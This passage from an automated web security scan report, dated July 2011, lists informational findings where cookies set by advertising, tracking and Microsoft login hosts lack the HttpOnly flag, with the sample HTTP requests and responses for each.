THvCA+ily4O24IMuEnJTXoZmpSgHQD89+2/fVTpN4aqXKNnzDREGGnsEuj+gObqhzbc0jTN6wpjAsV82F6cZgGaajYS1fTcKMVVdcJNbESUizsTti8oky+L2t22c53o8F87DIYOlifQhl0DW31nUdNKCg3kSOV2LuBbISDzIYDN2z9p906jF1FvxrD2xtzxTas48XslO7BtR/Lkh74WCTKmQ2rc9H80YXAs2x54Unx8/hxsRu+6b2TFgabOY74v0H6PliIbZ+0ydXPZvr6GGWt1iBTOoJfcT7e0r0Qe5tUy6iijtrwNpWUysX3FcgWlT9CuHU3gJRHyJPxVGfJBTFJujfwmoI+hRnc0LKORZAW1k5UeRkcRWCxLU52Me6ffBrSbQX2gnquKfS/b2VxpsWIm9rqf9zggWUDUrLtjKHHb1VVj+DgCD8+I6KxeXWrM0HOR10VA4/0vBbIbNfATwNEy72w8TZPWEb3p6LuFVvkrmJba841Ct2n2oS5ZeOq92UJQC6zjcYBLSxhF/t0AXtP7snMG+fZJDQwTvYGIQxtQZHil+3kXGDsffUdM3gb5syA9TCD/GpqE7Q3zYla7eCr5CWRdyEo3aZArBm7SqICFsHGhZSy//kxyHIB1otYfec3oESL3KgwPx4NyC/mDgzZQ1wt8ul6U9FCachkJ20hyVwespxYmr1+C05loldoIpguKfJkypsL+OS6RJU5FePTqpTUUoONn9nUKTy2Lsf5oc+Ek523257M/WcT6RgFIYhPu9y3Yr0rRdU0ulvPgycSTBrckLVb+D20GBuAyvfHoRoF62HV3ayGi/zh8siNJrhagSxaDEwXFucKUtavUMYEKTuRC8j2Ms7UyozH2JneopaDxgNJk+MKoVo2q5POAaOWl4Qa+4MMIBI5QEx757bfG9N5l7UiP4bmcg7jXVgOBlxvHVpqzaHZqbeE+hJAaYTgNJzGErBSf/JcZb+Bq1cxASNCLskHhpluAui7Mx3UfrKvZg1TBQAUT8tUmtBQVGG2rNrP8rUiTrIqJusRRAFGN4Z3Q4huvP+/6v0ly/Ajia3r0+PTunlBnF8m6hgek8/eD/1KZcpcezRJIH+FJffqEgwDG4XaW9PDSOnZVfZ97kzQFJ1DsgF7eT6O/leYLQbV7H1yx7g68Z9yK9XBfVT3Gp8e2mhq9IibPvafvXO9k9+fkyyzaLP+99jIeYOAGU/SjLsIF0PeYW9M3EVanQgdnNYYMm5zSlzveLFp1n6uSQCAGzn5SFQqGhfFuWQmTiQt2RxusqhOc/01vsL/Xim8k33jwRkhzBq27oQDyOwKJknkzJXI+dt6w/jVSbNHb/KGbMBj+GrY7ubtdTvUsuH"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 06 Jul 2011 14:01:39 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

10.22. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=64dfc632-184.84.247.65-1305305561; expires=Fri, 05-Jul-2013 11:22:09 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.23. http://b.scorecardresearch.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=845ba2-96.6.41.192-1309951287; expires=Fri, 05-Jul-2013 11:21:27 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p HTTP/1.1
Host: b.scorecardresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.24. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

u2=6d1502f0-782c-4c66-9617-aa4652ec4df13IV010; expires=Tue, 04-Oct-2011 07:36:40 GMT; domain=.serving-sys.com; path=/
eyeblaster=FLV=10.3181&RES=128&WMPV=0; expires=Tue, 04-Oct-2011 07:36:40 GMT; domain=bs.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.25. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A3=gs35b0E.0ca7000009bExaZS0084o00002kYwuaZXq09MY00001h8evaYRd0bI400000lGhvb0Ah0cEt00003lp66b0xe0dMv00002kSEGaZWa03sY00001kPIlaZWa03sY00000kHgIb0v.02WG00001jem9a.2L0c7wa.2L1kFaLa.2L09EZ00001lEOyaYx40cie00001kLQDb0xt0cbO00001h4.ob0xr0ca700002eBxyaZST03iw00001h51Tb0yn0ca700002h51Sb0Ah0ca700001h4.pb0vz0ca700001lzuRa+WF0ckj00001l7XCa+WC08Y500001hePeb0wK0cbO00001lzuXb3sV0ckj00001leMha.2F06hH00001lkqFa.2B06hH00001lFP5aZRG0dSu00001kovFb0xt0cjc00002jDBSaZUd0cbS00001jmcDa.2B0c7w00001kSCsaZWb03sY00001l.wtb0wj07Nz00001jDCqa+WC0cbS00001jDDva+WC0cbS00001jmdZa.2F0c7w00001lGkWb0vy0cEt00001le66b1na02WG00001hePyb0xq0cbO00001gs36b0xr0ca700000lu2rb0yg04m400001iz3QaZRG0bnA00001iyQIaYRd0bnA00001; expires=Tue, 04-Oct-2011 07:21:39 GMT; domain=.serving-sys.com; path=/
B3=78ox0000000001vcawTK0000000002vjatH70000000001vf990p0000000001v5anad0000000001vc835N0000000001vjajpm0000000001vcaJmE0000000001vcaKr10000000001vjaFbT0000000001vm9l7u0000000001vfajpn0000000000vcamoJ0000000001v58SCH0000000001vc9xv30000000001vf9xvo0000000001vc82MD0000000003vj838g0000000001vjafgy0000000001vf8n.z0000000000v99xv40000000001vfaAsi0000000001vf82MC0000000003vkaF580000000001vk9yJj0000000001vj82ME0000000000vj8SC30000000001v99u4N0000000002vjaF7y0000000002v8aHLh0000000002vs9i8L0000000001vf9.360000000001v8awPH0000000001vf838c0000000001vjaKr20000000003vk7dNF0000000001vj4ZUH0000000002vc90mq0000000001v5ajpj0000000001vc82MA0000000000vk; expires=Tue, 04-Oct-2011 07:21:39 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.26. http://bstats.adbrite.com/adserver/behavioral-data/0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bstats.adbrite.com
Path:	/adserver/behavioral-data/0

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ut="1%3AVZJJtoMgEEX3wtgB2KBmN4oabFCgVKIxe%2F80nn%2BS6T116z1K32iP0eONxvYwi24APRB0rDsvsuZ7Ly9y4UsDxhEU4mguoiuZJI5GEth6WKCf6%2BgB4xPtD9ru1sWpzL5hOtvJiReVh25X5Xdh44E%2BtbK7AOd0%2FtKy0Uatx8j4rXVUWM2IsgugU1PmQSMDUNOWWoXUpgggwS%2FqJuY4tFbbYEqbxDJRByBzsViFQd4GhajSK6LVodzcMffQupnioJTLq%2FBgWMKEmcTqlS0UU6o5bVNIJbmL9Rt3KSmF4V9RvhgJxTRj7r7wGsr6PgEvngpz6ab6M%2FuByy8ccm5E7AIovgPgqQ8WvqIKASJR7nqai%2FhKL%2BgiyOTiF4k5jAAdBh8nuH8pilBdzXOre%2F9joM%2FnDw%3D%3D"; path=/; domain=.adbrite.com; expires=Sat, 03-Jul-2021 15:39:06 GMT
vsd=0@2@4e14819a@view.atdmt.com; path=/; domain=.adbrite.com; expires=Fri, 08-Jul-2011 15:39:06 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.27. http://cang.baidu.com/do/add previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cang.baidu.com
Path:	/do/add

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BAIDUID=92E2D2F2A0513651099D245A96DCDBBE:FG=1; expires=Wed, 06-Jul-41 11:21:26 GMT; path=/; domain=.baidu.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.28. http://clk.atdmt.com/MRT/go/285207471/direct/01/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/MRT/go/285207471/direct/01/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ach00=903d/120af:6cf8/2750d:d99f/1afe8:bab9/11176:ba67/1c4e:f594/1c01f:66c2/39a1:66c2/3877; expires=Friday, 05-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
ach01=ce81a74/120af/134f208a/903d/4dd2907e:cf0807d/2750d/135a6ad5/6cf8/4de0ff1b:8a892c1/1afe8/bfedd64/d99f/4de0ffc1:a34fe32/11176/ab3574a/bab9/4de6e487:224f750/1c4e/4919ce6/ba67/4de6e67b:421378c/1c01f/825b020/f594/4de7e7e5:421378c/1c01f/8b4ca16/f594/4de7e7e7:421378c/1c01f/88b46ce/f594/4de7ecb3:c62bb85/39a1/123ee4af/66c2/4dfffb75:c388719/39a1/1235b344/66c2/4e008e93:c3ee9ca/3877/123ee6eb/66c2/4e008f9b; expires=Friday, 05-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /MRT/go/285207471/direct/01/ HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.29. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.p-td.com
Path:	/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=8496530639253255806; Domain=.p-td.com; Expires=Mon, 02-Jan-2012 11:21:57 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.30. http://delicious.com/save previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://delicious.com
Path:	/save

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BX=83u2utp718iep&b=3&s=du; expires=Tue, 06-Jul-2013 20:00:00 GMT; path=/; domain=.delicious.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /save HTTP/1.1
Host: delicious.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 06 Jul 2011 11:41:13 GMT
Set-Cookie: BX=83u2utp718iep&b=3&s=du; expires=Tue, 06-Jul-2013 20:00:00 GMT; path=/; domain=.delicious.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://www.delicious.com/save
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: private
Age: 0
Connection: close
Server: YTS/1.19.5

The document has moved <A HREF="http://www.delicious.com/save">here</A>.<P>

10.31. http://digg.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imp_id=be4697b47d58b1200ef3f6956c8cc49e2813419339d6fd7bb526092b66b1dc13; expires=Thu, 07-Jul-2011 11:37:07 GMT; path=/; domain=digg.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.32. http://digg.com/upcoming previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/upcoming

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imp_id=d49aeb50a0490b4b7e1f800682c23d942b50abde233eda6a7b26c684f1cf95d6; expires=Thu, 07-Jul-2011 11:37:07 GMT; path=/; domain=digg.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /upcoming HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.33. http://friendfeed.com/share previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://friendfeed.com
Path:	/share

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

AT=2925609834650468622_1309951295; Domain=.friendfeed.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /share HTTP/1.1
Host: friendfeed.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 11:21:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 0
Vary: Cookie
Server: FriendFeedServer/0.1
Location: https://friendfeed.com/account/login?next=%2Fshare
Cache-Control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: AT=2925609834650468622_1309951295; Domain=.friendfeed.com; Path=/

10.34. http://idcs.interclick.com/Segment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734311&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293&8803=734323; domain=.interclick.com; expires=Tue, 06-Jul-2021 15:39:03 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.35. http://js.revsci.net/gateway/gw.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

udm_0=MLv3NzMJZjpn3tsfwP0KOUz16+gnQCV8thMJiG9y0/Ny8RycOj5Ee7W6976f+6q5uEkCljxs8/kkfUBkYkyv8Z6yN0Nd4WTv6nXi+wXts6Wq9fr6i0BVdAbUIt5q/AIu1tFMoLa+s5ybvovc1/sBiFagcmNZNEVOe/GUhqpvMMfBuED2AAtbTPmHja7LcOz4agTWi1koiKCTVv3qzk/79Qe2uPaQ6S7kAtoomuw/f8LKElRxy0cr+w2LkZjOKbucdRZZ24QaRgKaY1AMwZ8CSy1q4Bj7frnr33+NAZ28K2eqWTRzqHhiemYOPzFThvMc/LKh+lxjqccKlpfLelX3klLEP/sLoQ0P6lQ6cdNVQb3x2dZu7Uos9MOBqUHAZBkGUV3WmZ+rBDbbykBkJ5ScL50YNQGZrrt/HsYLSFJ1iQJDtX0BBMQEhE9Bm6B8KTU2B/+Tl9/z5z97+8PbD0lxNA1yRZRhLlb5N+vXpOlVXGaet4LJUbUUroApU+zR8PD394xJmJO9uIGq3nczsCCgrviDk+wlwWBJxAe13ViEqMDGFqe/XYaHMLv4FfqGe9RDrkTiBsaURaU2tBuJuF4kcSjipIKo96BoAvnIgAQ5aQ6FMjFLmtDIaStvMYiow+kEShGdJz3hz2UWdehqqamV60647IIuCZ+2HMgzX1GZgTEwazFHHp14F2bopoWcS2XxRiPNuV43PLbWFQQYi4x8RbB7WZm3LZ5eAPFGPKP4lN/t3r6q2cvFC5xKH/C339zgf6wBbxY94vTIz3EVEmF37yH7WQ2IlDvlP5iqu6GwMlroZWZrWzZMhKjhXtVtLXnZKSEns45kweQXxc2zCs3qojoqj2qFHg4a001Z3yDllrXDwJAabHr5Wgc8y0BK/ofvDL7XHaSeEoljUxm9KkuLGCjfF1XYBkwuTVBNiJq8RqvSzK64qnZNRty5Q3h+StSof0aki+YNsomLdXGPiZWX83jCDKbTjSbj+hizDjviNSkx95cRiMmuryNaSdO05sUVi0qRJJJ9SmIHgtrm1PNCY2hXEpu1dsy5NhOU+gzwUFDzEHOsk2pWeFPfriTzXqIi4lN39TQllYCaGXn3ezQvFSjSIkIQwrkm6gBJ7gnTgRD6A5cOwIfQk9fSDSkvblZRDLqroqhO7bgYjuN+LcdM7Ve/43ZMpUERWhIMXfXy1aRrqf0LRfLalQrCDEjP9qJjlsKLTUkEX48QSaBB30VpKn8uFiU71y39ztY0ldEI6fKW0WZsvLi8RNNHwzwryegZdQNPqY3GCxrbPQglNmlJ/0AOv7efwM/lfzF+7EddIkVoJVC7/CnqGwbss3ro70EGZ/mHLDffQxKNs69LCdqfNz2d2IN/jFjEJIGfyu9hj+Y6Lz7/Aoq345+vsZJOQhUFmcZDdEjolfrv25Qs8YHoKtsd9x5OzwOMNHipu490I83yu94a7iWqDHgrR1yr/uMAvscudgUa3pQaYfusrPhHFl7VKw3dNYub5VjRz/zdMjAI8H/NhNVSkBt7UhNNkE91CvD5ucCHrIOsYwCTJ/k4LgHZO+JlPvGagrFzQG+/cazoZiKfk+Ww3aKjqgESDiv6pV05xqMO1JCtyp++YSQ0Fjk/q8DmQ3I694az4HJyeF0doaYqdgDTaemIgsk09TF0P3eY8qsFTdBqwFsRImeaUnZysTD9OAL/JihvJz1KIY9BLAr9MXTPdigmKhIA+N9hzv9imoMFmleig5A5x4f13nj0feG7vc77b2lf+9Hm5HyLNCOJjtCy8n1SLMSrosCmjbfKBA2fP1sWx3WrLZIf0ePVlA==; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:00:43 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.36. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=XGIFOFJwCob0FSRsKiwubaActKvAC0nxILpwIg02FFGCdbdRhhwihXUYIwjmGFGCsGeRhhAQvaUYIQW4FFGCLppRhhAmhXUYIAY4FFGCdDmRhhAmoZUYIwtlGFGCEHoRhhwoyaUYIU1aGFGCBHoRhhgdeZUYIYZgGFGC1mpRhhgHXaUYI0soGFGCX8rRhhAG/aUYIYxvGFGCKopRhhQ2kXUYIUEoGFGCVGoRhhgh3ZUYRGQYmjoxD0I9GsfzFZ8shNwjka4xk6hA1WjRaD7gCw8jGu9tSLAr8a820mvAz8qxc7qHGwyfGfgh3iyKgWQn; domain=advertising.com; expires=Fri, 05-Jul-2013 15:39:03 GMT; path=/
GUID=MTMwOTk2Njc0MzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; domain=advertising.com; expires=Fri, 05-Jul-2013 15:39:03 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.37. https://live.zune.net/xweb/passport/bottomCB.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://live.zune.net
Path:	/xweb/passport/bottomCB.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:39:03 GMT; path=/
EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:09:03 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/bottomCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.38. https://live.zune.net/xweb/passport/rightCB.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://live.zune.net
Path:	/xweb/passport/rightCB.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BSID=YJGgishn1FDOIHzbSuUPMCAIAABGs7BB5jvMASqQqOHLGf5OFjo09weF0q3UOnx8; domain=.zune.net; path=/
EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:39:01 GMT; path=/
EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
supportedTuner=Undefined; path=/
lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:09:01 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/rightCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.39. https://live.zune.net/xweb/passport/topCB.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://live.zune.net
Path:	/xweb/passport/topCB.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:38:58 GMT; path=/
EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:08:58 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/topCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
eid: e16080d6-37d3-4938-9cb2-f9f14681964f,7548
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:38:58 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:08:58 GMT; path=/
lx-svr: S803
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:08:57 GMT
Connection: close
Content-Length: 4616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

10.40. https://login.live.com/login.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/login.srf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MSPRequ=lt=1309950978&id=73625&co=1; path=/;version=1
MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-55d45d8a-4113-45e0-90d0-585f12970906; domain=login.live.com;path=/;version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.41. https://login.live.com/pp1100/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/pp1100/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MSPRequ=lt=1309951263&co=1&id=N; path=/;version=1
MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-173062aa-9edd-4769-b216-ebf691c92719; path=/;version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pp1100/ HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.42. https://login.live.com/ppsecure/post.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/ppsecure/post.srf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-f4d8415d-863c-470b-9c48-033be61fa412; path=/;version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppsecure/post.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.43. https://login.live.com/ppsecure/secure.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/ppsecure/secure.srf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MSPRequ=lt=1309951263&co=1&id=N; path=/;version=1
MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-2f030afb-c784-4e3b-9dbe-a3f70a5aa8ef; path=/;version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ppsecure/secure.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.44. https://login.live.com/resetpw.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/resetpw.srf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-3ccd6cb3-2eff-4d36-a83a-da7d7f8300dc; path=/;version=1
MSPBack=1309951135; domain=login.live.com;path=/;version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.45. http://m.webtrends.com/dcs1syazm89k7m2op08jll1k8_9j1d/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.webtrends.com
Path:	/dcs1syazm89k7m2op08jll1k8_9j1d/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAAQAAAACgAAAAuQAE6OjgBOfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAACh81E0nfNRNGwEAALYx2E22MdhNDQAAAOtv2E3rb9hNdQAAACu5500quedNoAEAAHks6E0aK+hNKwIAAFs76U1NO+lNZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAH5FFE5+RRROCQAAABMAAAALkABOjo4ATmYAAAB/O+lNfzvpTRUAAADrb9hN62/YTUQAAAAruedNKrnnTZQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAAB+RRROfkUUTgAAAAA-; path=/; expires=Sat, 03-Jul-2021 11:22:38 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

